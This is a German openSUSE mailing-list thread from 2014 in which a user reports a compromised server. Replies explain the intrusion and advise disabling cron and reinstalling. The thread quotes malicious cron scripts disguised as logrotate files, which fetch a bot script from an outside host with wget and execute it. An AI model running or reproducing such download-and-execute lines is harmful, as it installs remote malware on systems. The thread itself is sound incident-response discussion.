Hallo Gemeinde, wie der Einbruch geschah, habe ich noch nicht herausgefunden. Ich hatte mehrere Einträge aber mit 404 in meiner Apache Log. Ich werde ständig angepingt bis dahin aber erfolglos. Ich bin erst jetzt darauf gestossen, weil ich einen neuen Server aufsetze. Gruss Bernd Am 09.12.2014 um 15:27 schrieb Marcus Meissner:
On Tue, Dec 09, 2014 at 03:22:47PM +0100, Martin Schröder wrote:
Am 9. Dezember 2014 um 14:51 schrieb Bernhard Junk
: File 00logrotate #!/bin/sh wget http://stablehost.us/bots/regular.bot -O /tmp/sh 404 :-{
File logrotater
#!/bin/sh wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh sh /tmp/sh;rm /tmp/sh
Das lässt sich nicht löschen. Soll heißen? Wahrscheinlich mit chattr +i immutable gemacht wenn es ein so simples bot script ist.
Kann mir jemand erklären, was das bedeutet? Die Scripte laden ein Shellscript und führen das aus.
Erstmal den Cron abstellen: sudo systemctl stop cron
Wenn Du nicht sicher herausfinden kannst, wie der Einbruch geschah und das Loch schließen kannnst: Nuke it from orbit. Genau, Daten backupen so schnell wie moeglich und neu installieren.
Ciao, Marcus
-- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um den Listen Administrator zu erreichen, schicken Sie eine Mail an: opensuse-de+owner@opensuse.org